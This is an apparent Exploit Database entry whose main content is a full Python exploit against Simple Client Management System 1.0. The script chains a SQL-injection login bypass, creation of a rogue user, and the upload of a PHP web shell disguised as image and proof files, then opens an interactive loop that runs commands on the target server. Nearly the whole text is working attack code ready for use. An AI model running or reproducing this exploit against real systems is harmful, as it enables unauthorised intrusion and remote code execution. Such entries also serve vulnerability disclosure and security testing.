Simple Client Management System 1.0 – Remote Code Execution (RCE)

• Exploit Database
• 19 阅读

• 作者： Ishan Saha
  日期： 2021-07-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50094/

• # Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE)
  # Date: July 4, 2021
  # Exploit Author: Ishan Saha
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip
  # Version: 1.0
  # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali
  
  #!/usr/bin/python
  
  # Description:
  
  # 1. This uses the SQL injection to bypass the admin login and create a new user
  # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server
  # 3. the shell is called from the location 
  
  import requests 
  from colorama import Fore, Back, Style
  '''
  Description:
  Using the sql injeciton to bypass the login and create a user. 
  This user creates a client with the shell as an image and uploads the shell.
  The shell is called by the requests library for easier use.
  ------------------------------------------
  Developed by - Ishan Saha & HackerCTF team(https://twitter.com/hackerctf)
  ------------------------------------------
  '''
  # Variables : change the URL according to need
  URL="http://192.168.0.248/client/"
  shellcode = "<?php system($_GET['cmd']);?>"
  filename = "shell.php"
  authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"}
  createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"}
  userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"}
  shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"}
  def format_text(title,item):
  cr = '\r\n'
  section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr 
  item=str(item)
  text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
  return text
  
  
  ShellSession = requests.Session()
  response = ShellSession.get(URL)
  response = ShellSession.post(URL + "admin/index.php",data=authdata)
  response = ShellSession.post(URL + "admin/regester.php",data=createuser)
  response = ShellSession.post(URL,data=userlogin)
  response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")})
  location = URL +"img/" + filename
  #print statements
  print(format_text("Target",URL),end='')
  print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
  print(format_text("shell location",location),end='')
  print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
  
  while True:
  cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
  if cmd == 'exit':
  break
  print(ShellSession.get(location + "?cmd="+cmd).content.decode())